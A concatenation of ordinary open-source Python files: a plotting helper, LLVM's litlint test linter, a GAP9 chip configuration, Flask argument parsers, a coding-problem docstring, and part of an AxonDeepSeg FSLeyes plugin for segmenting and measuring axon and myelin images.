algo_abbreviations = [
plot_utils.ALGO_ABBREVIATIONS[algo] for algo in self.algorithms
]
plt.xticks(range(1, self.n_algo + 1), algo_abbreviations)
plt.xlim(0, len(self.algorithms) + 1)
if y_ticks:
plt.yticks(y_ticks)
if y_tick_labels:
plt.gca().set_yticklabels(y_tick_labels)
if self.subplot_axis_labels:
plt.xlabel('algorithm', fontsize=16)
plt.ylabel(y_label, fontsize=16)
plt.tick_params(top='off')
@staticmethod
def _extend_ylims_past_zero(data, tolerance=0.01, extension=0.1):
"""Extend y-axis to ensure that zero-values in the data are visible.
Args:
data: Data being plotted.
tolerance: Determines what values are considered too close to zero.
extension: Determines how far to extend the y-axis.
"""
ylims_orig = plt.gca().get_ylim()
abs_min = np.abs(np.min(data))
abs_max = np.abs(np.max(data))
# Extend below zero.
if abs_min < tolerance * abs_max:
ylim_lower = -ylims_orig[1] * extension
plt.ylim([ylim_lower, ylims_orig[1]])
# Extend above zero.
elif abs_max < tolerance * abs_min:
ylim_upper = -ylims_orig[0] * extension
plt.ylim([ylims_orig[0], ylim_upper])
def _barplot_legend(self):
"""Plot a legend showing the color/texture for each algorithm."""
for ibox in range(self.n_algo):
box_y = self.n_algo - ibox
plt.scatter(
0,
box_y,
s=300,
marker='s',
facecolor=ALGO_COLORS[ibox],
edgecolor='k',
hatch=HATCH_PATTERNS[ibox],
label=HATCH_PATTERNS[ibox])
plt.text(0.008, box_y - 0.15, self.algorithms[ibox], fontsize=14)
plt.xlim(-0.01, 0.05)
plot_utils.no_axis(plt.gca())
def _lineplot_legend(self):
"""Plot a legend showing the color/marker for each algorithm."""
for i_algo in range(self.n_algo):
y = self.n_algo - i_algo
color = ALGO_COLORS[i_algo]
plt.plot([0, 2], [y, y], color=color)
plt.plot(1, y, marker=MARKERS[i_algo], color=color)
plt.text(2.5, y - 0.002, self.algorithms[i_algo], fontsize=14)
ax = plt.gca()
plot_utils.no_axis(ax)
ax.set_axis_bgcolor('white')
plt.xlim([0, 10])
plt.ylim([0, self.n_algo + 1])
|
compiler-rt/lib/sanitizer_common/scripts/litlint.py | medismailben/llvm-project | 8,865 | 12686782 | #!/usr/bin/env python
#
# litlint
#
# Ensure RUN commands in lit tests are free of common errors.
#
# If any errors are detected, litlint returns a nonzero exit code.
#
import optparse
import re
import sys
# Compile regex once for all files
runRegex = re.compile(r'(?<!-o)(?<!%run) %t\s')
def LintLine(s):
""" Validate a line
Args:
s: str, the line to validate
Returns:
Returns an error message and a 1-based column number if an error was
detected, otherwise (None, None).
"""
# Check that RUN command can be executed with an emulator
m = runRegex.search(s)
if m:
start, end = m.span()
return ('missing %run before %t', start + 2)
# No errors
return (None, None)
def LintFile(p):
""" Check that each RUN command can be executed with an emulator
Args:
p: str, valid path to a file
Returns:
The number of errors detected.
"""
errs = 0
with open(p, 'r') as f:
for i, s in enumerate(f.readlines(), start=1):
msg, col = LintLine(s)
if msg != None:
errs += 1
errorMsg = 'litlint: {}:{}:{}: error: {}.\n{}{}\n'
arrow = (col-1) * ' ' + '^'
sys.stderr.write(errorMsg.format(p, i, col, msg, s, arrow))
return errs
if __name__ == "__main__":
# Parse args
parser = optparse.OptionParser()
parser.add_option('--filter') # ignored
(options, filenames) = parser.parse_args()
# Lint each file
errs = 0
for p in filenames:
errs += LintFile(p)
# If errors, return nonzero
if errs > 0:
sys.exit(1)
|
utils/gap_configs/python/gap/gap9/gap9.py | 00-01/gap_sdk | 118 | 12686788 | #
# Copyright (C) 2020 GreenWaves Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import gsystree as st
from gap.gap9.soc import Soc
from gap.gap9.cluster import Cluster, get_cluster_name
from ips.clock.clock_domain import Clock_domain
from ips.clock.clock_generator import Clock_generator
from ips.pmu.pmu_v4 import Pmu
from ips.padframe.padframe_v1 import Padframe
from ips.vendors.dolphin.rtc import Rtc
class Gap9(st.Component):
def __init__(self, parent, name, soc_config_file='gap/gap9/soc.json', cluster_config_file='gap/gap9/cluster.json', padframe_config_file='gap/gap9/padframe.json'):
super(Gap9, self).__init__(parent, name)
#
# Properties
#
soc_config_file = self.add_property('soc_config_file', soc_config_file)
cluster_config_file = self.add_property('cluster_config_file', cluster_config_file)
nb_cluster = self.add_property('nb_cluster', 1)
#
# Components
#
# Padframe
padframe = Padframe(self, 'padframe', config_file=padframe_config_file)
# Soc clock domain
soc_clock = Clock_domain(self, 'soc_clock_domain', frequency=50000000)
# Clusters clock domains
cluster_clocks = []
for cid in range(0, nb_cluster):
cluster_name = get_cluster_name(cid)
cluster_clocks.append(Clock_domain(self, cluster_name + '_clock', frequency=50000000))
# Clusters
clusters = []
for cid in range(0, nb_cluster):
cluster_name = get_cluster_name(cid)
clusters.append(Cluster(self, cluster_name, config_file=cluster_config_file, cid=cid))
# Soc
soc = Soc(self, 'soc', config_file=soc_config_file, chip=self, cluster=clusters[0])
# Fast clock
fast_clock = Clock_domain(self, 'fast_clock', frequency=24576063*2)
fast_clock_generator = Clock_generator(self, 'fast_clock_generator', powered_on=False, powerup_time=200000000)
# Ref clock
ref_clock = Clock_domain(self, 'ref_clock', frequency=65536)
ref_clock_generator = Clock_generator(self, 'ref_clock_generator')
# PMU
pmu = Pmu(self, 'pmu', config_file='gap/gap9/pmu.json')
# RTC
rtc = Rtc(self, 'rtc', **soc.get_property('soc/peripherals/rtc/config'))
#
# Bindings
#
# Padframe
self.bind(ref_clock_generator, 'clock_sync', padframe, 'ref_clock_pad')
self.bind(padframe, 'ref_clock', soc, 'ref_clock')
for name, group in padframe.get_property('groups').items():
pad_type = group.get('type')
nb_cs = group.get('nb_cs')
is_master = group.get('is_master')
is_slave = group.get('is_slave')
is_dual = group.get('is_dual')
if pad_type == 'gpio':
self.bind(padframe, name + '_pad', soc, name)
else:
if is_master:
self.bind(soc, name, padframe, name)
if is_dual:
self.bind(padframe, name + '_in', soc, name + '_in')
if is_slave:
self.bind(padframe, name, soc, name)
if is_dual:
self.bind(soc, name + '_out', padframe, name + '_out')
if nb_cs is not None:
for cs in range(0, nb_cs):
cs_name = name + '_cs' + str(cs)
cs_data_name = name + '_cs' + str(cs) + '_data'
if is_master:
self.bind(padframe, cs_data_name + '_pad', self, cs_data_name)
self.bind(padframe, cs_name + '_pad', self, cs_name)
if is_slave:
self.bind(self, cs_data_name, padframe, cs_data_name + '_pad')
self.bind(self, cs_name, padframe, cs_name + '_pad')
else:
if is_master:
self.bind(padframe, name + '_pad', self, name)
if is_slave:
self.bind(self, name, padframe, name + '_pad')
# Soc clock domain
self.bind(soc_clock, 'out', soc, 'clock')
# Clusters
for cid in range(0, nb_cluster):
cluster = clusters[cid]
self.bind(ref_clock_generator, 'clock_sync', cluster, 'ref_clock')
self.bind(cluster, 'dma_irq', soc, 'dma_irq')
for pe in range(0, clusters[0].get_property('nb_pe', int)):
self.bind(soc, 'halt_cluster%d_pe%d' % (cid, pe), cluster, 'halt_pe%d' % pe)
self.bind(cluster_clocks[cid], 'out', clusters[cid], 'clock')
self.bind(soc, get_cluster_name(cid) + '_fll', cluster_clocks[cid], 'clock_in')
self.bind(soc, get_cluster_name(cid) + '_input', clusters[cid], 'input')
self.bind(clusters[cid], 'soc', soc, 'soc_input')
# Soc
self.bind(soc, 'fast_clk_ctrl', fast_clock_generator, 'power')
self.bind(soc, 'ref_clk_ctrl', ref_clock_generator, 'power')
self.bind(soc, 'fll_soc_clock', soc_clock, 'clock_in')
# Fast clock
self.bind(fast_clock, 'out', fast_clock_generator, 'clock')
self.bind(fast_clock_generator, 'clock_sync', soc, 'fast_clock')
self.bind(fast_clock_generator, 'clock_ctrl', fast_clock, 'clock_in')
# Ref clock
self.bind(ref_clock, 'out', ref_clock_generator, 'clock')
# RTC
self.bind(rtc, 'apb_irq', soc, 'rtc_apb_irq')
self.bind(rtc, 'irq', soc, 'wakeup_rtc')
self.bind(rtc, 'event', soc, 'rtc_event_in')
self.bind(soc, 'rtc_input', rtc, 'input')
self.bind(soc_clock, 'out', rtc, 'clock')
self.bind(ref_clock_generator, 'clock_sync', rtc, 'ref_clock')
# PMU
self.bind(soc_clock, 'out', pmu, 'clock')
self.bind(soc, 'pmu_input', pmu, 'input')
self.bind(pmu, 'icu6_reset', clusters[0], 'reset')
self.bind(pmu, 'icu5_reset', soc, 'reset')
self.bind(ref_clock, 'out', pmu, 'ref_clock')
self.bind(pmu, 'event', soc, 'event')
self.bind(pmu, 'scu_ok', soc, 'scu_ok')
self.bind(pmu, 'picl_ok', soc, 'picl_ok')
self.bind(soc, 'wakeup_out', pmu, 'wakeup')
self.bind(soc, 'wakeup_seq', pmu, 'wakeup_seq')
# SOC
self.bind(self, 'bootsel', soc, 'bootsel')
self.bind(fast_clock, 'out', soc, 'fast_clock_out')
def gen_gtkw_conf(self, tree, traces):
if tree.get_view() == 'overview':
self.vcd_group(self, skip=True)
else:
self.vcd_group(self, skip=False)
|
embedding-calculator/src/services/flask_/parse_request_arg.py | Precistat/CompreFace | 1,779 | 12686801 | <filename>embedding-calculator/src/services/flask_/parse_request_arg.py
# Copyright (c) 2020 the original author or authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
from flask import Request
from src.exceptions import InvalidRequestArgumentValueError
UNDEFINED = '__UNDEFINED__'
def parse_request_bool_arg(name: str, default: bool, request: Request) -> bool:
param_value = request.args.get(name.lower(), UNDEFINED).upper()
if param_value == UNDEFINED:
return default
if param_value in ('TRUE', '1'):
return True
elif param_value in ('FALSE', '0'):
return False
else:
raise InvalidRequestArgumentValueError(f"'{name}' parameter accepts only 'true' (or '1') and 'false' (or '0')")
def parse_request_string_arg(name: str, default, allowed_values, request: Request) -> str:
name = name.lower()
param_value = request.args.get(name.lower(), UNDEFINED).upper()
if param_value == UNDEFINED:
return default
allowed_values = list(allowed_values)
if param_value not in allowed_values:
raise InvalidRequestArgumentValueError(f"'{name}' parameter accepts only '{', '.join(allowed_values)}' values")
return param_value
|
amazon_problems/problem_13.py | loftwah/Daily-Coding-Problem | 129 | 12686803 | """This problem was asked by Amazon.
Given a pivot x, and a list lst, partition the list into three parts.
• The first part contains all elements in lst that are less than x
• The second part contains all elements in lst that are equal to x
• The third part contains all elements in lst that are larger than x
Ordering within a part can be arbitrary.
For example, given x = 10 and lst = [9, 12, 3, 5, 14, 10, 10], one partition may be `[9, 3, 5, 10, 10, 12, 14].
""" |
ads_plugin.py | wukathryn/axondeepseg | 115 | 12686830 | """
This is an FSLeyes plugin script that integrates AxonDeepSeg tools into FSLeyes.
Author : <NAME>
"""
import wx
import wx.lib.agw.hyperlink as hl
import fsleyes.controls.controlpanel as ctrlpanel
import fsleyes.actions.loadoverlay as ovLoad
import numpy as np
import nibabel as nib
from PIL import Image, ImageDraw, ImageOps
import scipy.misc
import json
from pathlib import Path
import AxonDeepSeg
from AxonDeepSeg.apply_model import axon_segmentation
from AxonDeepSeg.segment import segment_image
import AxonDeepSeg.morphometrics.compute_morphometrics as compute_morphs
from AxonDeepSeg import postprocessing, params, ads_utils
from config import axonmyelin_suffix, axon_suffix, myelin_suffix, index_suffix, axonmyelin_index_suffix
import math
from scipy import ndimage as ndi
from skimage import measure, morphology, feature
import tempfile
import openpyxl
import pandas as pd
import imageio
VERSION = "0.2.19"
class ADSsettings:
"""
This class handles everything related to the parameters used in the ADS plugin, including the frame for the settings
menu.
"""
def __init__(self, ads_control):
"""
Constructor for the ADSsettings class. Initializes the default settings.
:param ads_control: An instance of ADScontrol
:type ads_control: ADScontrol
"""
self.ads_control = ads_control
# Declare the settings used
self.overlap_value = 25
self.model_resolution = 0.01 # Unused
self.use_custom_resolution = False # Unused
self.custom_resolution = 0.07 # Unused
self.zoom_factor = 1.0
self.axon_shape = "circle"
def on_settings_button(self, event):
"""
This function creates the settings_frame (the settings menu). It is called when the 'settings' button has been
pressed.
"""
self.settings_frame = wx.Frame(self.ads_control, title="Settings", size=(600, 300))
frame_sizer_h = wx.BoxSizer(wx.VERTICAL)
# Add the overlap value to the settings menu
sizer_overlap_value = wx.BoxSizer(wx.HORIZONTAL)
overlap_value_tooltip = wx.ToolTip("Represents the number of pixels that overlap two patches of the image when "
"applying the prediction model")
sizer_overlap_value.Add(wx.StaticText(self.settings_frame, label="Overlap value (pixels): "))
self.overlap_value_spinCtrl = wx.SpinCtrl(self.settings_frame, min=0, max=100, initial=self.overlap_value)
self.overlap_value_spinCtrl.Bind(wx.EVT_SPINCTRL, self.on_overlap_value_changed)
self.overlap_value_spinCtrl.SetToolTip(overlap_value_tooltip)
sizer_overlap_value.Add(self.overlap_value_spinCtrl, flag=wx.SHAPED, proportion=1)
frame_sizer_h.Add(sizer_overlap_value)
# Add the zoom factor to the settings menu
sizer_zoom_factor = wx.BoxSizer(wx.HORIZONTAL)
zoom_factor_tooltip = wx.ToolTip("When applying the model, the pixel size of the image will be "
"multiplied by this number. The zoom factor does not affect the computation of morphometrics.")
sizer_zoom_factor.Add(wx.StaticText(self.settings_frame, label="Zoom factor: "))
self.zoom_factor_spinCtrlDouble = wx.SpinCtrlDouble(self.settings_frame, initial=self.zoom_factor, inc=0.0001)
self.zoom_factor_spinCtrlDouble.Bind(wx.EVT_SPINCTRLDOUBLE, self.on_zoom_factor_changed)
self.zoom_factor_spinCtrlDouble.SetToolTip(zoom_factor_tooltip)
sizer_zoom_factor.Add(self.zoom_factor_spinCtrlDouble, flag=wx.SHAPED, proportion=1)
frame_sizer_h.Add(sizer_zoom_factor)
# Add the axon shape selection
axon_shape_choices = ["circle", "ellipse"]
sizer_axon_shape = wx.BoxSizer(wx.HORIZONTAL)
axon_shape_tooltip = wx.ToolTip('Select what is the shape of the axons that will be considered when computing '
'the morphometrics. "circle" will use the equivalent diameter (diameter of a circle with the same area as the axon). '
'"ellipse" will use minor axis of a fitted ellipse as diameter.')
sizer_axon_shape.Add(wx.StaticText(self.settings_frame, label="Axon shape: "))
self.axon_shape_combobox = wx.ComboBox(
self.settings_frame,
choices=axon_shape_choices,
size=(100, 20),
value=self.axon_shape
)
self.axon_shape_combobox.Bind(wx.EVT_COMBOBOX, self.on_axon_shape_combobox_item_selected)
self.axon_shape_combobox.SetToolTip(axon_shape_tooltip)
sizer_axon_shape.Add(self.axon_shape_combobox, flag=wx.SHAPED, proportion=1)
frame_sizer_h.Add(sizer_axon_shape)
# Add the done button
sizer_done_button = wx.BoxSizer(wx.HORIZONTAL)
done_button = wx.Button(self.settings_frame, label="Done")
done_button.Bind(wx.EVT_BUTTON, self.on_done_button)
sizer_done_button.Add(done_button, flag=wx.SHAPED, proportion=1)
frame_sizer_h.Add(sizer_done_button)
self.settings_frame.SetSizer(frame_sizer_h)
self.settings_frame.Show()
def on_overlap_value_changed(self, event):
self.overlap_value = self.overlap_value_spinCtrl.GetValue()
def on_zoom_factor_changed(self, event):
self.zoom_factor = self.zoom_factor_spinCtrlDouble.GetValue()
def on_axon_shape_combobox_item_selected(self, event):
self.axon_shape = self.axon_shape_combobox.GetStringSelection()
def on_done_button(self, event):
# TODO: make sure every setting is saved
self.settings_frame.Close()
class ADScontrol(ctrlpanel.ControlPanel):
"""
This class is the object corresponding to the AxonDeepSeg control panel.
"""
def __init__(self, ortho, *args, **kwargs):
"""
This function initializes the control panel. It generates the widgets and adds them to the panel. It also sets
the initial position of the panel to the left.
:param ortho: This is used to access the ortho ops in order to turn off the X and Y canvas as well as the cursor
"""
ctrlpanel.ControlPanel.__init__(self, ortho, *args, **kwargs)
# Create the settings object
self.settings = ADSsettings(self)
# Add a sizer to the control panel
# This sizer will contain the buttons
sizer_h = wx.BoxSizer(wx.VERTICAL)
# Add the logo to the control panel
ADS_logo = self.get_logo()
sizer_h.Add(ADS_logo, flag=wx.SHAPED, proportion=1)
# Add the citation to the control panel
citation_box = wx.TextCtrl(
self, value=self.get_citation(), size=(100, 50), style=wx.TE_MULTILINE
)
sizer_h.Add(citation_box, flag=wx.SHAPED, proportion=1)
# Add a hyperlink to the documentation
hyper = hl.HyperLinkCtrl(
self, -1, label="Need help? Read the documentation", URL="https://axondeepseg.readthedocs.io/en/latest/"
)
sizer_h.Add(hyper, flag=wx.SHAPED, proportion=1)
# Define the color of button labels
button_label_color = (0, 0, 0)
# Add the image loading button
load_png_button = wx.Button(self, label="Load PNG or TIF file")
load_png_button.SetForegroundColour(button_label_color)
load_png_button.Bind(wx.EVT_BUTTON, self.on_load_png_button)
load_png_button.SetToolTip(wx.ToolTip("Loads a .png or .tif file into FSLeyes"))
sizer_h.Add(load_png_button, flag=wx.SHAPED, proportion=1)
# Add the mask loading button
load_mask_button = wx.Button(self, label="Load existing mask")
load_mask_button.SetForegroundColour(button_label_color)
load_mask_button.Bind(wx.EVT_BUTTON, self.on_load_mask_button)
load_mask_button.SetToolTip(
wx.ToolTip(
"Loads an existing axonmyelin mask into FSLeyes. "
"The selected image should contain both the axon and myelin masks. "
"The regions on the image should have an intensity of 0 for the background, "
"127 for the myelin and 255 for the axons. "
)
)
sizer_h.Add(load_mask_button, flag=wx.SHAPED, proportion=1)
# Add the model choice combobox
self.model_combobox = wx.ComboBox(
self,
choices=ads_utils.get_existing_models_list(),
size=(100, 20),
value="Select the modality",
)
self.model_combobox.SetForegroundColour(button_label_color)
self.model_combobox.SetToolTip(
wx.ToolTip("Select the modality used to acquire the image")
)
sizer_h.Add(self.model_combobox, flag=wx.SHAPED, proportion=1)
# Add the button that applies the prediction model
apply_model_button = wx.Button(self, label="Apply ADS prediction model")
apply_model_button.SetForegroundColour(button_label_color)
apply_model_button.Bind(wx.EVT_BUTTON, self.on_apply_model_button)
apply_model_button.SetToolTip(
wx.ToolTip("Applies the prediction model and displays the masks")
)
sizer_h.Add(apply_model_button, flag=wx.SHAPED, proportion=1)
# The Watershed button's purpose isn't clear. It is unavailable for now.
# # Add the button that runs the watershed algorithm
# run_watershed_button = wx.Button(self, label="Run Watershed")
# run_watershed_button.Bind(wx.EVT_BUTTON, self.on_run_watershed_button)
# run_watershed_button.SetToolTip(
# wx.ToolTip(
# "Uses a watershed algorithm to find the different axon+myelin"
# "objects. This is used to see if where are connections"
# " between two axon+myelin objects."
# )
# )
# sizer_h.Add(run_watershed_button, flag=wx.SHAPED, proportion=1)
# Add the fill axon tool
fill_axons_button = wx.Button(self, label="Fill axons")
fill_axons_button.SetForegroundColour(button_label_color)
fill_axons_button.Bind(wx.EVT_BUTTON, self.on_fill_axons_button)
fill_axons_button.SetToolTip(
wx.ToolTip(
"Automatically fills the axons inside myelin objects."
" THE MYELIN OBJECTS NEED TO BE CLOSED AND SEPARATED FROM EACH "
"OTHER (THEY MUST NOT TOUCH) FOR THIS TOOL TO WORK CORRECTLY."
)
)
sizer_h.Add(fill_axons_button, flag=wx.SHAPED, proportion=1)
# Add the save Segmentation button
save_segmentation_button = wx.Button(self, label="Save segmentation")
save_segmentation_button.SetForegroundColour(button_label_color)
save_segmentation_button.Bind(wx.EVT_BUTTON, self.on_save_segmentation_button)
save_segmentation_button.SetToolTip(
wx.ToolTip("Saves the axon and myelin masks in the selected folder")
)
sizer_h.Add(save_segmentation_button, flag=wx.SHAPED, proportion=1)
# Add compute morphometrics button
compute_morphometrics_button = wx.Button(self, label="Compute morphometrics")
compute_morphometrics_button.SetForegroundColour(button_label_color)
compute_morphometrics_button.Bind(wx.EVT_BUTTON, self.on_compute_morphometrics_button)
compute_morphometrics_button.SetToolTip(
wx.ToolTip(
"Calculates and saves the morphometrics to an excel and csv file. "
"Shows the indexes of the axons at the coordinates specified in the morphometrics file."
)
)
sizer_h.Add(compute_morphometrics_button, flag=wx.SHAPED, proportion=1)
# Add the settings button
settings_button = wx.Button(self, label="Settings")
settings_button.SetForegroundColour(button_label_color)
settings_button.Bind(wx.EVT_BUTTON, self.settings.on_settings_button)
sizer_h.Add(settings_button, flag=wx.SHAPED, proportion=1)
# Set the sizer of the control panel
self.SetSizer(sizer_h)
# Initialize the variables that are used to track the active image
self.png_image_name = []
self.image_dir_path = []
self.most_recent_watershed_mask_name = None
# Toggle off the X and Y canvas
oopts = ortho.sceneOpts
oopts.showXCanvas = False
oopts.showYCanvas = False
# Toggle off the cursor
oopts.showCursor = False
# Toggle off the radiological orientation
self.displayCtx.radioOrientation = False
# Invert the Y display
self.frame.viewPanels[0].frame.viewPanels[0].getZCanvas().opts.invertY = True
# Create a temporary directory that will hold the NIfTI files
self.ads_temp_dir_var = tempfile.TemporaryDirectory() #This variable needs to stay loaded to keep the temporary
# directory from being destroyed
self.ads_temp_dir = Path(self.ads_temp_dir_var.name)
# Check the version
self.verrify_version()
def on_load_png_button(self, event):
"""
This function is called when the user presses on the Load Png button. It allows the user to select a PNG or TIF
image, convert it into a NIfTI and load it into FSLeyes.
"""
# Ask the user which file he wants to convert
with wx.FileDialog(
self, "select Image file", style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST
) as file_dialog:
if (
file_dialog.ShowModal() == wx.ID_CANCEL
): # The user cancelled the operation
return
in_file = Path(file_dialog.GetPath())
# Check if the image format is valid
image_extension = in_file.suffix
valid_extensions = [".png", ".tif", ".jpg", ".jpeg"]
if image_extension not in valid_extensions:
self.show_message("Invalid file extension")
return
# Store the directory path and image name for later use in the application of the prediction model
self.image_dir_path.append(in_file.parents[0])
self.png_image_name.append(in_file.name)
# Call the function that convert and loads the png or tif image
self.load_png_image_from_path(in_file)
def on_load_mask_button(self, event):
"""
This function is called when the user presses on the loadMask button. It allows the user to select an existing
PNG mask, convert it into a NIfTI and load it into FSLeyes.
The mask needs to contain an axon + myelin mask. The Axons should have an intensity > 200. The myelin should
have an intensity between 100 and 200. The data should be in uint8.
"""
# Ask the user to select the mask image
with wx.FileDialog(
self, "select mask .png file", style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST
) as file_dialog:
if (
file_dialog.ShowModal() == wx.ID_CANCEL
): # The user cancelled the operation
return
in_file = Path(file_dialog.GetPath())
# Check if the image format is valid
image_extension = in_file.suffix
valid_extensions = [".png", ".tif", ".jpg", ".jpeg"]
if image_extension not in valid_extensions:
self.show_message("Invalid file extension")
return
# Get the image data
img_png2D = ads_utils.imread(in_file)
image_name = in_file.stem
# Extract the Axon mask
axon_mask = img_png2D > 200
axon_mask = params.intensity['binary'] * np.array(axon_mask, dtype=np.uint8)
# Extract the Myelin mask
myelin_mask = (img_png2D > 100) & (img_png2D < 200)
myelin_mask = params.intensity['binary'] * np.array(myelin_mask, dtype=np.uint8)
# Load the masks into FSLeyes
axon_outfile = self.ads_temp_dir / (image_name + "-axon.png")
ads_utils.imwrite(axon_outfile, axon_mask)
self.load_png_image_from_path(axon_outfile, is_mask=True, colormap="blue")
myelin_outfile = self.ads_temp_dir / (image_name + "-myelin.png")
ads_utils.imwrite(myelin_outfile, myelin_mask)
self.load_png_image_from_path(myelin_outfile, is_mask=True, colormap="red")
def on_apply_model_button(self, event):
"""
This function is called when the user presses on the ApplyModel button. It is used to apply the prediction model
selected in the combobox. The segmentation masks are then loaded into FSLeyes
"""
# Declare the default resolution of the model
resolution = 0.1
# Get the image name and directory
image_overlay = self.get_visible_image_overlay()
if self.get_visible_image_overlay() is None:
return
n_loaded_images = self.png_image_name.__len__()
image_name = None
image_directory = None
for i in range(n_loaded_images):
if image_overlay.name == (Path(self.png_image_name[i])).stem:
image_name = self.png_image_name[i]
image_directory = self.image_dir_path[i]
if (image_name is None) or (image_directory is None):
self.show_message(
"Couldn't find the path to the loaded image. "
"Please use the plugin's image loader to import the image you wish to segment. "
)
return
image_path = image_directory / image_name
image_name_no_extension = Path(image_name).stem
# Get the selected model
selected_model = self.model_combobox.GetStringSelection()
if selected_model == "":
self.show_message("Please select a model")
return
# Get the path of the selected model
if any(selected_model in models for models in ads_utils.get_existing_models_list()):
dir_path = Path(AxonDeepSeg.__file__).parents[0]
model_path = dir_path / "models" / selected_model
else:
self.show_message("Please select a model")
return
# If the TEM model is selected, modify the resolution
if "TEM" in selected_model.upper():
resolution = 0.01
# Check if the pixel size txt file exist in the imageDirPath
pixel_size_exists = (image_directory / "pixel_size_in_micrometer.txt").exists()
# if it doesn't exist, ask the user to input the pixel size
if pixel_size_exists is False:
with wx.TextEntryDialog(
self, "Enter the pixel size in micrometer", value="0.07"
) as text_entry:
if text_entry.ShowModal() == wx.ID_CANCEL:
return
pixel_size_str = text_entry.GetValue()
pixel_size_float = float(pixel_size_str)
else: # read the pixel size
resolution_file = open((image_directory / "pixel_size_in_micrometer.txt").__str__(), 'r')
pixel_size_float = float(resolution_file.read())
# Load model configs and apply prediction
model_configfile = model_path / "config_network.json"
with open(model_configfile.__str__(), "r") as fd:
config_network = json.loads(fd.read())
segment_image(
image_path,
model_path,
self.settings.overlap_value,
config_network,
resolution,
acquired_resolution=pixel_size_float * self.settings.zoom_factor,
verbosity_level=3
)
# The axon_segmentation function creates the segmentation masks and stores them as PNG files in the same folder
# as the original image file.
# Load the axon and myelin masks into FSLeyes
axon_mask_path = image_directory / (image_name_no_extension + str(axon_suffix))
myelin_mask_path = image_directory / (image_name_no_extension + str(myelin_suffix))
self.load_png_image_from_path(axon_mask_path, is_mask=True, colormap="blue")
self.load_png_image_from_path(myelin_mask_path, is_mask=True, colormap="red")
self.pixel_size_float = pixel_size_float
return self
def on_save_segmentation_button(self, event):
"""
This function saves the active myelin and axon masks as PNG images. Three (3) images are generated in a folder
selected by the user : one with the axon mask, one with the myelin mask and one with both.
"""
# Find the visible myelin and axon masks
axon_mask_overlay = self.get_corrected_axon_overlay()
if axon_mask_overlay is None:
axon_mask_overlay = self.get_visible_axon_overlay()
myelin_mask_overlay = self.get_visible_myelin_overlay()
if (axon_mask_overlay is None) or (myelin_mask_overlay is None):
return
# Ask the user where to save the segmentation
with wx.DirDialog(
self,
"select the directory in which the segmentation will be save",
defaultPath="",
style=wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST,
) as file_dialog:
if file_dialog.ShowModal() == wx.ID_CANCEL:
return
save_dir = Path(file_dialog.GetPath())
# store the data of the masks in variables as numpy arrays.
# Note: since PIL uses a different convention for the X and Y coordinates, some array manipulation has to be
# done.
# Note 2 : The image array loaded in FSLeyes is flipped. We need to flip it back
myelin_array = np.array(
myelin_mask_overlay[:, :, 0], copy=True, dtype=np.uint8
)
myelin_array = np.flipud(myelin_array)
myelin_array = np.rot90(myelin_array, k=1, axes=(1, 0))
axon_array = np.array(
axon_mask_overlay[:, :, 0], copy=True, dtype=np.uint8
)
axon_array = np.flipud(axon_array)
axon_array = np.rot90(axon_array, k=1, axes=(1, 0))
# Make sure the masks have the same size
if myelin_array.shape != axon_array.shape:
self.show_message("invalid visible masks dimensions")
return
# Remove the intersection
myelin_array, axon_array, intersection = postprocessing.remove_intersection(
myelin_array, axon_array, priority=1, return_overlap=True)
if intersection.sum() > 0:
self.show_message(
"There is an overlap between the axon mask and the myelin mask. The myelin will have priority.")
# Scale the pixel values of the masks to 255 for image saving
myelin_array = myelin_array * params.intensity['binary']
axon_array = axon_array * params.intensity['binary']
image_name = myelin_mask_overlay.name[:-len("_seg-myelin")]
myelin_and_axon_array = (myelin_array // 2 + axon_array).astype(np.uint8)
ads_utils.imwrite(filename=save_dir / (image_name + str(axonmyelin_suffix)), img=myelin_and_axon_array)
ads_utils.imwrite(filename=save_dir / (image_name + str(myelin_suffix)), img=myelin_array)
ads_utils.imwrite(filename=save_dir / (image_name + str(axon_suffix)), img=axon_array)
def on_run_watershed_button(self, event):
"""
This function is called then the user presses on the runWatershed button. This creates a watershed mask that is
used to locate where are the connections between the axon-myelin objects.
The runWatershed button is currently commented, so this function is unused at the moment.
"""
# Find the visible myelin and axon masks
axon_mask_overlay = self.get_visible_axon_overlay()
myelin_mask_overlay = self.get_visible_myelin_overlay()
if (axon_mask_overlay is None) or (myelin_mask_overlay is None):
return
# Extract the data from the overlays
axon_array = axon_mask_overlay[:, :, 0]
myelin_array = myelin_mask_overlay[:, :, 0]
# Make sure the masks have the same size
if myelin_array.shape != axon_array.shape:
self.show_message("invalid visible masks dimensions")
return
# If a watershed mask already exists, remove it.
for an_overlay in self.overlayList:
if (self.most_recent_watershed_mask_name is not None) and (
an_overlay.name == self.most_recent_watershed_mask_name
):
self.overlayList.remove(an_overlay)
# Compute the watershed mask
watershed_data = self.get_watershed_segmentation(axon_array, myelin_array)
# Save the watershed mask as a png then load it as an overlay
watershed_image_array = np.rot90(watershed_data, k=3, axes=(1, 0))
watershed_image = Image.fromarray(watershed_image_array)
file_name = self.ads_temp_dir.name + "/watershed_mask.png"
watershed_image.save(file_name)
wantershed_mask_overlay = self.load_png_image_from_path(
file_name, add_to_overlayList=False
)
wantershed_mask_overlay[:, :, 0] = watershed_data
self.overlayList.append(wantershed_mask_overlay)
# Apply a "random" colour mapping to the watershed mask
opts = self.displayCtx.getOpts(wantershed_mask_overlay)
opts.cmap = "random"
self.most_recent_watershed_mask_name = "watershed_mask"
def on_fill_axons_button(self, event):
"""
This function is called when the fillAxon button is pressed by the user. It uses a flood fill algorithm to fill
the inside of the myelin objects with the axon mask
"""
# Find the visible myelin and axon mask
myelin_mask_overlay = self.get_visible_myelin_overlay()
axon_mask_overlay = self.get_visible_axon_overlay()
